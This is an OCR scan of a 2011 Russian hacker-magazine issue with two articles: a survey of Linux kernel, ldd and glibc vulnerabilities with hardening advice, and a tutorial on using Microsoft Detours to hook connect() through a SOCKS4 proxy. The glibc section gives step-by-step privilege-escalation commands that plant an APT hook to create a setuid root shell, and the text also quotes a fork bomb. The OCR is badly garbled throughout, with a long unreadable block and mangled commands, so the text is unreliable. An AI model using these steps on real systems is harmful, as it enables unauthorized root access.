• Сегодня мы представим твоему вниманию самые опасные 
уязвимости в 6№/Ыпих за последнее время и покажем, что без 
дополнительных средств защиты и регулярных обновлений он тоже 
очень уязвим. 



КегпеІ 

Ядро — самая важная и, пожалуй, самая 
сложная часть ОС (если это, конечно, не 
микроядро). Ыпих содержит более тринадцати 
миллионов строк кода. Поэтому неудивитель- 
но, что периодически в нем обнаруживают 
уязвимости. Так, например, в октябре про- 



шлого года в коде, отвечающем за поддержку 
протокола П05 (НеІіаЫе Оаіадгапп Зоскеіз), 
была обнаружена уязвимость, позволяющая 
повысить свои привилегии в системе до гооі 
(СѴЕ-201 0-3904). П05 предназначен для 
высокоскоростного обмена данными между 
узлами (прежде всего, в кластере) и нацелен 



на использование шины ІпбпіВапсІ. Он был 
создан в недрах корпорации Огасіе и широко 
используется, пожалуй, только в ее продуктах. 
Таким образом, штука эта весьма и весьма 
узкоспециализированная. Однако этой уяз- 
вимости оказались подвержены большинс- 
тво дистрибутивов, так как в них поддержка 



► 092 



ХАКЕР 02 (145) 201 1 





чти ГТЯ Л0иР.№іи,1 I 

Шкч ФНѴНіі-191 44М-І-І1. ѣ .\Ш{ 4р-ГІГ.|МиНІ4іЕ. Т. И кК } чМЪЯ 
#ЧП*+ _СН№ДНПІтгІ|Ш 4і ( #ЕП+ТГ<Н*«Л, ц . 9 1: > к*4І-РІШ 
ѵіаіі'і н і і ііДдМ г ИіЬн^ЛС !*! *г І ріГ^ІГІіН #іИ М I . ] чЫІНйк 
**ІІІА* _ГГГ_1-Н4Г?І«4ГІ+) й I МДОМЦТ' |Ц І+И Г ІЗі I Аі1*«І 

ІІКШ с ы* ЫРігІІйЭД 

*№Ш +: 

іііііе іяі РЬ^ѵчй. 

ткЧкЕкІі НлЕэЕ В4!ІІМ 1 ВДИ-Іот-Л 

іШЬЬ ІЛІ ѴНІ'К'Чі ПІІЯ14, [ГНІИ-Ч, 

или 

■ Шфі с-члг ГГѴІІЛ.Р ІНІ 

ііігги «мг ііі-піріІідиі 

чжЪмм тел* іл 
іі»ги № мчн^іі- 

ЧНІиІПШиНиЦиІІиЕМѴиттНйііІи ПУИ^амй мО мН' 

■ 1*-...^ ..1 1 1 иъ,нч і г.^. ] і у ці ■.,. **.. іяг. Гулу? ■ 

'^№№ШЯІ>Й\к№іІГ»№ЛІ , ,іНІі№№№№1ІШ^ікиІГ 
»У4!гііТРисФіг»и,Р«\іЕІлі«мЫ.м1йм4іміМчі»и»и7Счі^- 

■ ЧДЭ|^4№+ДО*КГ , 



жПіі * м І П І»Л-ИТТ «И 1 

*іі кн Р№І№№ &№тКП.Ё Іі 

рм+И* 

і)МЯ гЗггіі*г ІѴі 1 ^ гП- 

ЧіШаи^і^-, и >іаі>.і-и\ І ймчгілНілІ^іл1іі4І-.і4і^ІІ'илА- 
-^№4 Гѵ«-іі\і 4 Гѵі і ^ѵ»ѵ»ЧѴЧ^ЧРрЧ\»Ч , иЧѴ^«Г 
грі.іѴп-и-. і к і м .іЩ-.ійі -. іП-.і№іі * .«іі. ■№ 1 1 г 

\ - ■ I Г\і4ТѴлѴ> і1І'Н , 1гіЧі№’.ггЗ~ 



А4*й*л«*-*1Ч * < а * а * 

_ЙМГ(г^Щ _Я_ЙИ_к”-0, 



Часть кода эксплоита-бэкдора от АсІсІЫісИЗг 




Использование уязвимости в К05-модуле 



РЮ5 была вкомпилирована модулем (С0МРІ6_Р0Б=т). 
Уязвимость подтвердили для всех ядер с поддержкой П05: 
с 2.6.30 по 2.6.35. 

Обнаружив уязвимость, Дэн Розенберг из ѴігІиаІЗесигіІу 
Резеагсб сначала сообщил о ней разработчикам ядра, и 
только послето го, какони выпустили фикс (15 октября 2010), 
Дэн обнародовал данные обуязвимости (19октября) и опуб- 
ликовал эксплоит, который можно взять здесь: ѵ\л/\лл/.У5еси гНу. 
сот/сіоѵѵпІоасіДооІз/Ііпих-гсІз-ехрІоіІ.с . Работу эксплоита ты 
можешь наблюдать на иллюстрации кстатье. Быстрее всех 
обновление вышло кіібипіи (9.10, 1 0.04 и 10.10) — 19октября. 
РебНаІ выпустил обновления ксвоим продуктам только 25 
октября (обновлениедолго тестировалось). БеЬіап Беппус 
относительно стареньким 2.6.26 не был подвержен уязви- 
мости ввиду отсутствия поддержки РБ5. Пока брешь не была 
закрыта, производители предлагали заблокировать загрузку 
модуля гсЫесли протокол не используется): 

# есЬо "ЫаскІізЬ гЦз" > \ 

/еЬс/шосіргоЬе . сІ/ЫаскІізк-гсІз . соп± 

Следующая интересная уязвимость в ядре любопытна 
не столько сама по себе, сколько благодаря истории, 
развернувшейся вокруг нее. В 2007 году известный ис- 
следователь безопасности Бен Хоукс обнаружил опасную 
транзакцию 32-битных вызовов в 64-битных ядрах. Эта 
уязвимость позволяла повысить свои привилегии в сис- 
теме до гооЕ Веп сообщил об этом разработчикам, и они 
исправили ошибку. Каковоже было его удивление, когда 
в 2010 году он обнаружил уязвимость на том же месте, как 
нив чем не бывало. Оказалось, что в 2008 году из-за его 
первоначального патча была обнаружена регрессия, и код 
был исправлентаким образом, что уязвимость появилась 
вновь. Таким образом, все ядра, вышедшие в 2008-2010, 
оказалисьуязвимы. Но это еще не конец истории. Бен 
Хоукс выложил РоС, демонстрирующий, что уязвимость 
существует: 5оіа.аеп.п2/сотраі2/гоЬеіі ѵои зиск.с . Через 
некоторое время в общем доступе на зесіізіз.оп появил- 
ся уже не РоС, а вполне себе работающий эксплоит от 
АсІсІЬНсЬЗг: 5ес[І5І5.огдЛи[ИІ5с[озиге/2010/5ер/аи-268/ 
АВКѵѵ с.Ьіп . РоС Бена содержал менее двухсот строк кода 
и был легко читаем, эксплоитже от Асі 6Ы ІсбЗг был раз- 
мером больше тысячи строки практически нечитабелен. 

И, какоказалось, не зря. Ребята из Кзріісе обнаружили, 
что этот эксплоит является одновременно бэкдором, 



позволяющимудаленно получить права суперпользова- 
теля на данном компьютере. По одним данным, бэкдор 
накрепко поселялся в системе, по другим — для лечения 
достаточно перезагрузки. Наглядная демонстрация того, 
что не стоит запускать подобные вещи. В крайнем случае 
— на виртуальной машине... отдельного тестового компа. 
Следующая уязвимость в ядре (СѴЕ-201 0-2240) примеча- 
тельна своей «живучестью» и широким спектром уязви- 
мых версий: она была известна минимум шесть лет, но не 
была исправлена по нелепой случайности. Затрагивает, 
скорее всего, все ядра ветки 2.6 (а возможно, и 2.4). Уяз- 
вимость сидит в одной из самых важных подсистем ядра, 
отвечающей за управление памятью: оказывается, ядро 
допускало пересекающиеся границы для двух разных об- 
ластей виртуальной памяти. Таким образом, при соблюде- 
нии определенныхусловий можно было добиться выпол- 
нения произвольного кода. Проще всего для эксплуатации 
уязвимости было использовать Х-сервер (с расширением 
МІТ-5НМ) и любое графическое приложение (необяза- 
тельно специально написанное, теоретически подойдет, 
например, дырявый браузер или РБР- ридер). Подробную 
инфу по эксплуатации уязвимости через Х-сервер можно 
почерпнуть в документе хогд-Іагде-іліеіліогу-аиаскз.рсТ на 
сайте ѵѵѵѵѵѵ.іпѵІБІЫеІбіпдБІаЬ.сопп . 

Защитить от эксплуатации данной уязвимости не спо- 
собны ни ЗЕБІпих, ни сбгооТ Каквременное решение по 
защите отатаки именно на Х-сервер было предложено 
отключить МІТ-5НМ, добавив в хогд.сопЕ 

$ саЪ /еЪс/ХІІ/хогд.сопі: 

Зескіоп "Ехкепзіопз " 

Оркіоп "МІТ-ЗНМ" " сИзаЫе" 

ЕпсІЗесЦіоп 

Для устранения данной уязвимости срочно были выпущены 
обновления ядер 2.6.32. 19, 2.6.34.4 и 2.6.35.2. Примечатель- 
но, что еще в 2004 году разработчики изЗІІЗЕ предложили 
свой патч, но по каким-то причинам он не был включен в 
ванильное ядро. ЗБЕБ и орепЗІІВЕданнойуязвимости не 
имеют. Ксожалению, не все уязвимости удается пофиксить 
полностью и достаточно оперативно. Яркийтому при- 
мер — совсем свежая уязвимость в ядре, позволяющая от 
локального непривилегированного пользователя осущес- 
твить Бо5- атаку. Код для проверки «подвержена ли твоя 
система данной уязвимости» можно взять тут: Ікті.огд/ 




> іпіо 

зиісі-бит — атрибут 
исполняемого 
файла, позволяющий 
запустить его с 
правами владельца. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• дгзесигііу.пеі 
— офсайт патча 
дгзесигііу; 

• ѵѵѵѵѵѵ.депіюо. 
огд/ргоДеп/багсІ- 
епеб/ — Эепіюо 
для параноиков, с 
интегрированным 
дгзесигііу и другими 
патчами; 

• ѵѵѵѵѵѵ.орепѵѵаЦ. 
сот/ОѵѵІ — еще 
один дистрибутив, 
помешанный на 
безопасности. 
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ІЛМІХОЮ 




Опции конфигурирования дгзесигііу 



5/8. На некоторых конфигурациях выполнение этого кода 
приводит к 1 00%загрузке всех ядер процессора, исчерпанию файловых 
дескрипторов и зависанию. На других — процесс просто сильно за гру- 
жаетсистему. Обнаружить какую-нибудь закономерность в версии ядра, 
разрядности и такдалее пока неудалось. Причем, если слегка модифи- 
цировать данный код, то он вполне способен повесить и некоторых пред- 
ставителей ВБО-семейства, например ЕгееВБй 8.1 или ОрепВБй 4.8. 

В отличие оттой же банальной форк-бомбы (например, классической 
«:(){:!:& };:»), данный код имеет следующие особенности: 

• Невозможность выставить какие-нибудьограничения через и Игш И; 
(основной способзащиты отфорк-бомб); 

• Процесс нельзя убить. Даже от гооі. Даже через « к і 1 1 -КІИ». Поможет 
только перезагрузка. 

На момент написания статьи еще не существует патча, устраняющего 
данную проблему на всех конфигурациях. Есть только частичноустра- 
няющие проблему. 

5у$+ет 

Не менее опасными могут быть и «неядерные»уязвимости, обнаружен- 
ные в каком-нибудь широко распространенном системном компоненте 
дистрибутива. Взять, например, уязвимостьв Ібб. Она не оченьопасна, 
но зато достаточно интересна. Уязвимость позволяет, используя специ- 
ально созданный бинарник, выполнитьсвой код вместо вывода списка 
динамическихбиблиотек. Обычный вывод Ібб выглядитпримернотак: 

# ІсЫ /Ьіп/ріпд 

Ііпих-ѵсізо . зо . 1 => ( 0х00007^^Еб9Ь7е000 ) 

ІіЬс.зо.б => /1іЬ/1іЬс . зо . 6 ( 0х00007^сі0ссе9^000 ) 
/1іЪ64/1сІ-1іпих-х86-64 . зо . 2 (0x00 007 1с10сс1243 ООО) 

На самом деле, Ібб — это просто Ьазб-скрипт, который устанавливает 
переменную окружения І_0_ТРАСЕ_І_0АВЕ0_0В6ЕСТ5=1 , а затем 
выполняет программу. За грузчик динамических библиотек Іб-Ііпих.зо, 
в свою очередь, проверяет значение этой переменной. Если пере- 
менная установлена, то выводится список динамических библиотек, 
а программа не выполняется. Другими словами, вместо запуска Ібб 
можно использовать та кую конструкцию: 

# ЬВ_ТКАСЕ_Ь0АБЕБ_0ВЦЕСТ5=1 /Ьіп/ріпд 

Ііпих-ѵсізо . зо . 1 => ( 0х00007ііі232с1а000 ) 

ІіЬс.зо.б => /ІіЬ/ііЬс .зо.б ( 0х00007і1Ьі73 63 000 ) 
/1іЬб4/1сі-1іпих-х8б-б4 . зо . 2 ( 0x00007 11М7 6е6000 ) 

Однако недавно Петерис Круминс обнаружил, что если программу 
собрать с помощью слегка модифицированной версии ІіЬс, то можноза- 
ставить Іб-Ііпих.зо не проводить проверку, а сразу исполнять код. То есть, 
если кто-нибудь выполнит«1бб ехріоіі», это приведет к выполнению 
бинарника ехріоіі;. «Польза» оттакой уязвимости весьма сомнительна, 
но Петерисописываетодин из сценариев ее использования: пользова- 
тель хостинга жалуется администратору, что его программа не работает. 
Администратор первым делом выполняет«1бб ехріоіі» (с правами гооі, 
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Список самых уязвимых приложений 2010 по версии 
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разумеется). Программа выполняется, кроме полезныхдействий имити- 
руя нормальный вывод Ібб, где сообщается, что не хватает какой-нибудь 
библиотеки. Администраторуведомляетоб этом пользователя, и все 
остаются довольны: администратор оттого, что избавился оточередного 
глупого юзера, а пользователь — оттого, что порутал сервер. 

Прошедший год был также богат на уязвимости в діібс, гораздо 
более серьезные, чем в Ібб. Одна изуязвимостей (СѴЕ-201 0-3847) 
позволяетлокальному пользователю получить права гооі. Проблема 
вызвана тем, что діібс игнорирует некоторые пункты спецификации 
ЕЬЕ. Для реализации этой уязвимости необходимо и достаточно 
наличие прав на создание жестких ссылок в файловой системе, до- 
пускающей наличие зиіб-файлов, и, собственно, какой-нибудьзиіб- 
бинарни к. Бинарник и каталоге доступом на запись должны быть на 
одном разделе (таккаксозданиежесткихссылоквозможнотолько в 
пределах одного раздела). Примечательно, что разработчики діібс 
обуязвимости знали, но не считали, что ее возможно эксплуатиро- 
вать. Уязвимость затронула Еебога (вместе с РНЕЬ/СепіОБ), а также 
некоторые другие дистрибутивы. Оебіап и ІІЬипІи не были задеты 
по чистой случайности — из-за немного других опций сборки едіібс. 
До выхода обновления защититься отэтой уязвимости можно очень 
просто — достаточно, чтобы все директории, доступные пользовате- 
лям на запись (например, /боте и /ітр), были смонтированы с опци- 
ей позиіб. Но не успели в діібс как следует залатать эту уязвимость, 
как обнаружили другую: СѴЕ-201 0-3856. Уязвимости имеютобщие 
корни, и эта тоже позволяет поднять свои привилегии в системе, но 
нетребуетдля эксплуатации прав на создание жестких ссылок. Свя- 
зана новая уязвимость с недостаточными проверка ми при динами- 
ческом связывании (в режиме Е0_А1Ю1Т) библиотеке би на рн и ка ми 
с установленным зиіб -битом. Для реализации необходима библи- 
отека, не учитывающая наличие зиіб -файла, и, собственно, любой 
зиіб-бинарник, например: 



$ 1з -1 /Ьіп/ріпд 

-гмзг-хг-х 1 гооР гооС 34716 2010-07-28 14:44 /Ьіп/ріпд 



В качестве библиотеки будем использовать стандартную библиотеку 
профилирования Іібрсргоіііе. В Оебіап/ІІбипІи она входитв стан- 
дартный пакетіібс, в РНЕЬ/Еебога — в пакет Іібс-иіііз. Использовать 
именно эту библиотеку не обязательно — можно любую, не проверяю- 
щую различие ЕШО и ІІЮ. 



$ 1з -1 /1іЬ/1іЬрсргоіі1е . зо 

-гѵ\г-г — г — 1 гооі: гооі: 5496 2010-09-11 00:32 /ІіЪ/ 
ІіЬрсргоііІе . зо 
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“ эгіерк : ЬатЬ 

Количество модулей в стандартном ядре ІіЬипіи 



Для начала выставим нужную итазк, чтобы файлы создавались с 
правами 666: итазк 0. Собственно, эксплуатируем уязвимость: 

$ ЬВ_АІГОІТ= " ІіЪрсргоІіІе .зо" РСРЕОРІЬЕ_ОиТРит= " /еСс/ 
арр/арр . сопі . сі/бббехріоір" /Ьіп/ріпд 

По идее, у непривилегированного пользователя нет прав на запись в 
катал ог/еІс/арі/арЕсопЕб, однако: 

$ 1з -1 /еЪс/арЪ/арЪ.сопі: .сі/бббехріоі*; 

-гѵі-гѵг-гѵі- 1 гооѣ асберС 4 2010-12-04 01:03 /еРс/арС/арР . 
сопі . сІ/666ехр1оіЦ 

Такой вот нехитрой манипуляцией мы получили файл /еіс/арі/арі. 
сопбб/бббехріоіі с возможностью в него писать. С помощью данной 
уязвимости можно только создать новый файл, перезаписать уже 
существующий не получится. Почему я записал именно в арЕсопЕб? 
Да, логичнее было бы создать файликс собственным заданием стоп, 
но стандартный для большинства дистрибутивов ѵіхіе-сгоп выполняет 
правилатолько в файлах с правами 644, иначе ругается на «ВАй РНЕ 
МСЮЕ». В гс- с крипты тоже писать бесполезно, так как нужно право на 
выполнение, а сделатьего через данную уязвимость невозможно. В 
общем, файл создан, можно в него что-нибудь написать, например: 

$ еско "АРТ: :ІІрс1аЦе: :Рге-Іпѵоке { \"ср /Ып/Ьазк /Стр/ 
ехріоір && сктосі и+з /Дтр/ехрІоіДХ " ; };" > /еРс/арР/арР . 
сопі . сі/бббехріоір 

Теперь при каждом выполнении «арі-деі ирбаіе» будет создаваться 
файликДтр/ехрЫТ Если настроены автообновления — вообще хоро- 
шо, ждать долго не придется. Когда это событие, наконец, произошло: 

$ /Ътр/ехрІоіР -р 

ехр1оіР-4 . I# ѵблоаті 
гооР 

в РебНаІ проанализировали последниеуязвимости (втом числе и в 
діібс), поразмыслили и решили, что зиіб-бит вообще — это зло. Поэ- 
тому во всех следующих своих продуктах от использования зиіб-бита 
постараются отойти, используя вместо него специальный механизм 
ядра — сарабіІШез. Первые результаты такой политики должны быть 
видны уже в Еебога 1 5. 

Что же делать? 

Сложного ПО без ошибок просто не существует, поэтому придется 
смириться стем фактом, что уязвимости будут обнаруживаться пос- 
тоянно. Но можно постараться максимально себя от них обезопасить. 
Для этого нужно, во-первых, избавиться от всего ненужного в ОС, 
оставив только минимальный набор. Начать можно с анализа списка 
работающих сервисов: например, от использования аѵаЫ-баетоп 
многие могут отказаться. В нужных сервисах, в свою очередь, 
оставитьтолько самый необходимый списокфункций. Например, 
отключить поддержку ІРѵб там, где она не нужна (код поддержки ІРѵб 
во всех сервисах относительно новый и еще недостаточно протес- 



тирован). Также неплохая идея пересобрать ядротолько с нужными 
опциями (драйверами, протоколами, еіс). 

Во-вторых, нужно оперативно получать информацию о новых 
уязвимостях в используемом ПО: здесь отлично подойдут таіі- 
листы используемого дистрибутива, Р55 с багтраков (например, с 
зесигіЫосиз.сот ) и так далее. 

В-третьих, получать обновления безопасности тоже хочется макси- 
мально быстро. Стоит рассмотреть возможность автоматической ус- 
тановки обновлений безопасности (на некритичном сервере, думаю, 
это оправданно, а вотна ЫдЫоаб ргобисбоп-сервере я бы не рискнул). 
В ОеЬіап (и его производных) автоматическая установка обновлений 
безопасности настраивается с помощью пакета ипаНепбеб-ирдгабез. 
В Ребога/СепЮЗ — с помощью уипп-ирсіаіезсі или уит-сгоп. 

И, наконец, надо постараться максимальноувеличитьзащиту своей ОС. 
Тут все сильно зависит от области применения, но в большинстве случа- 
ев не помешаетустановка/настройка ВЕЫпих или АррАгтог — они хоть 
и неэффективны при эксплуатации дыр в ядре или низкоуровневых 
системных компонентах, но достаточно полезны при компрометации 
какого-нибудьдемона или пользовательского приложения. Повысить 
безопасность ядра и его «окружения» тоже можно: например, с помо- 
щью специальных патчей, самый известный из которых — дгзесигііу. 
Основной компонент дгзесигііу — РаХ, специальный патч, ограничи- 
вающий доступ приложений кстраницам памяти: сегмент данных про- 
грамм в памяти помечается как недоступный для исполнения, а сегмент 
кода — какгеабопіу. В придачу используется рандомизация памяти — 
при каждом запросе память выделяется из произвольных мест. Кроме 
РаХ, дгзесигііу может предложить следующие основные дополнения: 

• ролевой контроль доступа (РВАС); 

• улучшение безопасности сЬгооІ путем наложения дополнительных 
ограничений — например, невозможность просмотреть процессы, 
запущенные извне сЬгооЕ 

• опция, запрещающая непривилегированным пользователям 
запускать бинарники, не принадлежащие пользователю гооі или 
доступные на запись для всех; 

• запрет на чтение некоторых файлов в/ргос и запрет на выполнение 
сітезд и пеізіаі; отобычного пользователя; 

• ограничение использования ссылок: запретна создание жесткой 
ссылки на файл и на использование симлинка, если пользователь не 
является владельцем файла. 

Недавно разработчики ванильного ядра тоже всерьез задумались о 
безопасности. Пока предлагается реализовать следующие механизмы: 

• внедрить РаХ (или его часть); 

• реализоватьзащитный механизм, запрещающий выполнение кода 
и операций записи для определенных частей модулей; 

• ограничение доступа кэлементам из/ргос, позволяющим получить 
важную для атаки информацию (возможно, часть кода будет взята из 
дгзесигііу); 

• контроль автозагрузки модулей; 

• специальная метка, помечающая процесс кактолько 32- или 
64-битный. 

И многое другое. Весь список можно посмотреть в разделе 
«Роабтар -> КегпеІНагбепіпд» на сайте ЬиргУА/ѵікі.иЬипІи.сот . 
Надеюсь, хотя бы часть из этого списка мы скоро сможем увидеть в 
ванильном ядре, □с 
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Місгозоіі Оеіоигз - честное средство 
для настоящего хакера 



о Помнишь, как ты писал код, подменяющий АРІ-вызовы в своем 
крутом трояне? Или хотя бы читал статью о том, как это делается? 
Дай угадаю - тебе не понравилось отсутствие хоть какого-нибудь 
инструментария от МісгозоН? Так вот, хочу тебя обрадовать - 
теперь ситуация кардинально изменилась. Встречай МісгозоН 
Оеіоигз! 



ѴѴТР? 

Місгозоіі Оеіоигз — проект, разрабатываемый в лабораториях 
Місгозоіі ПезеагсЬ (хотя, судя по дате последнего обновления — 
уже не разрабатываемый], позволяющий перехватывать ѴѴіп32 
АРІ-вызовы. 64 бита он тоже умеет, но., за 10 килобаксов :]. Да, 
коммерческая (и 64-битная) версия стоит именно столько, а вот 
для образовательных (хе-хе, конечно, конечно) целей он абсолютно 
бесплатен. Несмотря на то, что проект давненько не обновлялся, он 
содержит весь необходимый для перехвата вызовов функционал, и 
работает безглючно (по крайней мере, я каких-либо багов не заме- 
тил). 

Скачать инсталлятор Оеіоигз можно на гезеагсб.ті егозой. сот . 

По умолчанию он установится в Ргодгат Рі 1ез\М іегозобі; Резеагсб. 
Если ты считаешь, что на этом установка окончена, ты глубоко 
заблуждаешься. Сначала нужно собрать бинарники самой библио- 
теки и примеры к ней — для этого в консоли ѴС++ надо выполнить 
плаке, и подождать, пока все это добро соберется. А вот ху[Артем, 
не используй это слово, у нас же приличный журнал — прим, 
ред.]. Как бы не так! Мелкомягкий компилятор, датируемый 2008-м 
годом, наотрез отказался его собирать. Поковырявшись само- 
стоятельно, я решил погуглить. Оказалось, что Місгозоіі в курсе 
этой проблемы, но делать ничего не собирается. Почесав недолго 
репу, на сіеіоигз я благополучно забил. Некоторое время спустя, 



поставив ради интереса 2005-ю студию, я решил попытать счастья 
снова — и опа, собралось! Так что учти, что для сборки сей заме- 
чательной библиотеки тебе понадобится Ѵізиаі С++ 2005 (можно и 
ехргезз]. Насчет 2010-й не в курсе — в то время ее не было, а сей- 
час нет желания иметь какие-то дела со студией вообще, поэтому 
весь код был написан в Ѵізиаі С++ 2005/2008 (хотя, писать можно и 
в блокноте). 

От сіеіоигз нам понадобится заголовочный файл сіеіоигз. б, а также 
библиотеки беІоигеб.ІіЬ, сіеіоигз. ІіЬ и беІоигесЫІІ. 

А писать мы с тобой будем соксификатор на 50СК54 — программка 
полезная, отлично показывающая возможности Місгозоіі Оеіоигз, а 
заодно вспомним спецификации этого несложного протокола. 

Как оно работает? 

Принцип работы прост, как дырка отжо[Артем, опять ты за свое! 

— прим. ред.] — мы пишем Ои_, в которой реализуем нашу вер- 
сию вызова сооІ_саЩ), пишем приложение, которое запускает 
нужный нам софте нужной библиотекой, и подсовывающий этой 
софтине наш АРІ-вызов, устанавливая щтр с адресом левого 
вызова в начало оригинального вызова. Для примера, запустим в 
дебаггере любое приложение, использующее, к примеру, функцию 
соппесС ( ) , поставим бряк на эту функцию, при остановке выпол- 
нения нажмем на Ѳо То ОізаззетЫу, и увидим: 
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В статье исполь- 
зовались мате- 
риалы пользователя 
НаЬгаНаЬг.Ви с 
ником ЬоЬегтапіас. 




> ѵѵагпіпд 

Не переусердствуй 
с перехватом данных 
— это может быть 
запрещено законода- 
тельством 



< > 

00411573 саіі (Тлгогсі рСг [ ітр соппесС@12 (4183В0Ь.) ] 

< > 

Перейдем по РІО до этой строчки, нажмем Р1 1 и окажемся в 
листинге этой функции: 

< > 

71А94А07 шоѵ ейі , есіі 

71А94А09 ризЬ. еЬр 

Знаешь, что такое тоѵ есіі, ебі? Это, по сути, КІОР, пропуск такта 
процессора, неиспользуемая инструкция. Сюда-то и вставляется 
щтр на нашу функцию. Теперь запустим эту программу с «левым» 
вызовом, подсунутым ей Оеіоигз’ом. И что же мы видим? 

< > 

71А94А07 ^шр @ІЬТ+715 (_ту_соппесС@12 ) (100112Б0Ъ.) 

< > 

Да-да, вместо ІМОР’а появился щтр на адрес нашей реализации 
функции соппесШ =). 

От простого к сложному 

Напишем простую программку, которая будет запускать приложение 
с нашей библиотекой. Для запуска понадобится всего одна функция 

— БеЦоигСгеаЦеРгосеззМцШІІ ( ) , и мы должны передать 7 
что-то значащих параметров, остальное, в лучших традициях ѴѴіпАРІ 

- [МІІЦ_. 

• ЬРСТЗТК ІрАррІісаДіопЫаше — полный путь к запускаемому 
приложению; 



• ВООЬ МпЬегіенапсіІез — будет ли приложение наследовать 
хэндлы от нашего ІаипсЬег’а — нам это не надо, поэтому — баізе; 

• ШГОКВ (ТлгСгеаДіопЕІадз — флаги запуска приложения. 
Запускать его нужно в приостановленном режиме, поэтому 
СКЕАТЕ_БЕРАиЬТ_ЕККОК_МОБЕ | СКЕАТЕ_ЗиЗРЕЫВЕБ; 

• ЬРЗТАКТЦРіШЕОЮ ІрЗЕагДиріпРо — указатель на структуру, 
содержащую информацию о запуске приложения; 

• ЬРРКОСЕЗЗ_ШЕОКМАТІОЫ ІрРгосеззІпбогтаДіоп — ука- 
затель на структуру, содержащую информацию о запущенном при- 
ложении; 

• ЬРСЗТК ІрВеДоигесіВІІРаЦЬ — путь до динамической библио- 
теки сІеІоигесЫИ; 

• ЬРСЗТК ІрВІІЫагпе — путь до нашей ОІ_І_-ки; 

В итоге код запуска приложения выглядит так: 

Ъооі гез = БеСоигСгеаСеРгосеззМСІіБІІ ( 

Б"Р: \\БеБоигзТезЦ\\БеЪид\\БеБоигзТезЦ . ехе" , 

ШЬЬ, ШЫх, ШББ, Раізе , бнРІадз , ШББ, ШЪЬ, 

&зі, &рі , сіеСоигесШате , сІІІЫате, ШББ) ; 

Не забудь обнулить структуры перед передачей в функцию, если соби- 
раешься их потом использовать! Если приложение запустилось нор- 
мально — нужно возобновить (в нашем случае — запустить) выполне- 
ние его главного потока функцией РезитеТЬгеаб, передав ей в каче- 
стве параметра рі .ЬтЬгеасІ Собственно, с «Запускатором», все. 

Четверо носков 

Теперь переходим к более сложному этапу — написанию самой ОІ_І_. 
Для соксификации приложения нам надо перехватить всего- 
навсего один вызов — всем известный соппесШ. Создавай в студии 
пустой проект — ОІ_І_. 
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Перед перехватом нужно сохранить адрес оригинальной функции, 
чтобы можно было ее вызвать: 



іпк (ТлПШАРІ * геа1_соппеск ) (БОСКЕТ зоск, сопзк 
зоскасМг *аск1г, іпк пашеіеп) = соппеск; 

После этого пишем свою функцию, полностью повторяющую 
оригинал. Обрати внимание — полностью повторяющую, то есть 
не только по параметрам, но и по соглашению о вызове! На эти 
грабли мне уже «посчастливилось» наступить, поэтому считаю 
своим долгом предупредить об этом тебя :]. 

Что мы должны сделать, чтобы соксифицировать приложение? 
Нам надо перехватить вызов функции соппесбО, и, вместо уста- 
новления соединения с указанным сервером, соединиться с 
50СК5-сервером, передать ему запрос на соединение, и вернуть 
получившийся дескриптор сокета приложению, которое запро- 
сило соединение. А приложение даже и не поймет, что работает 
через 50СК5-прокси, ибо протокол 50СК5 прозрачен и для кли- 
ента, и для сервера. 

Моя реализация этой функции проста до безобразия: 




• 1 байт — нулевой, игнорируетсфя; 

• 1 байт — результат: 

0x5а — все ок, 

0х5Ь — ба і I, 

0x5с — недоступен клиентский ібепісі, 

0х5сі — ібепісі не смог опознать пользователя. 

• 2 байта — должны игнорироваться; 

• 4 байта — должны игнорироваться. 

Пример «общения» клиента с сервером: 



Клиент : 

0x04 | 0x01 I 0x00 0x50 I 0x42 Охбб 0x07 ОхбЗ I 0x00 

Сервер : 

0x00 I 0x5а I ОхХХ ОхХХ | ОхХХ ОхХХ ОхХХ ОхХХ 
Где ОхХХ — случайное значение (эти байты должны 
игнорироваться ) 

После этого можно общаться с 50СК5-сервером, как с обыкно- 
венным сервером, к которому мы и подключаемся. 

Вот как я реализовал подключение к 50СК5-у: 



БЬЬЕХРОКТ іпк ѴШГАРІ шу_соппеск ( 

БОСКЕТ зоск, сопзк зоскасМг *аМг, іпк пашеіеп) 

{ 

гекшгп соппескТо8оскз4 ( геа1_соппеск , геа1_зепсЦ 
геа1_гесѵ, "68.102.100.62", 55465, 

(зкгиск зоскаМг_іп *) аМг) ; 

} 

соппескТоЗоскз4 ( ) — функция, устанавливающая соединение 
с 50СК5-сервером. На всякий случай, я установил хуки еще и на 
зепсі ( ) и гесѵ ( ) , хотя в конкретно данном случае это не требу- 
ется. Их реализацию приводить тут я не буду — она аналогична 
функции соппеск ( ) . 

В точке входа нашей динамически подгружаемой библиотеки 
нужно, собственно, установить хуки (или снять, при завершении 
работы с ней). Делается это с помощью нескольких функций: 

• БекоигКезкогеАккегЭДікк ( ) — восстанавливает таблицу 
импорта приложения после его запуска; 

• БекоигТгапзаскіопВедіп ( ) — вызывается перед установ- 
кой/снятием хука; 

• БекоигБрсіакеТкгеасІ ( ) — инициализирует установку/снятие 
хука для указанного потока; 

• Подмену заданного вызова выполняет функция Оебои гАббасЬ : 



<„. Вырезан код .„> 



скаг геріу [8]; 
скаг раскек [ 9 ] ; 



раскек [ 0 ] 
раскек [ 1 ] 
раскек [ 2 ] 
раскек [ 3 ] 
раскек [ 4 ] 
раскек [ 5 ] 
раскек [ 6 ] 



0x04; 

0x01; 

г_кюзк->зіп_рогк / 0x100; 
г_кюзк->зіп_рогк % 0x100; 
г_кюзк->зіп_аМг . 8_ип . 8_ип_Ь . з_Ъ1 ; 
г_козк->зіп_асМг . 8_ип . 8_ип_Ь . з_Ъ2 ; 
г_кюзк->зіп_аМг . 8_ип. 8_ип_Ь- з_ЪЗ ; 



раскек [ 7 ] 



г_кюзк->зіп_аМг . 8_ип . 3_ип_Ь . з_Ъ4 ; 



раскек [8] = 0x0 0; 



г_зепб ( зоск, раскек, 9, 0); 



шешзек ( геріу , 0x00, 9); 

іпк гесѵсі = г_гесѵ(зоск, геріу, 9, 0); 



<... Вырезан код .„> 



БекоигАккаск ( & ( РѴОІБ& ) геа1_соппеск , шу_соппеск ) ; 

После выполнения подмены нужно завершить транзакцию вызо- 
вом функции БекоигТгапзаскіопСошшік ( ) . 

В случае, если нужно убрать хук, выполняются те же самые дей- 
ствия, только БекоигАккасЬ ( ) заменяется на БекоигБекаск ( ) . 
Теперь давай посмотрим спецификацию протокола 50СК54. 

После установки коннекта к 50СК5-серверу нужно отправить 
пакет с информацией о наших намерениях. Пакет выглядит так: 

• 1 байт — версия 50СК5, в случае четвертой версии протокола — 0x04; 

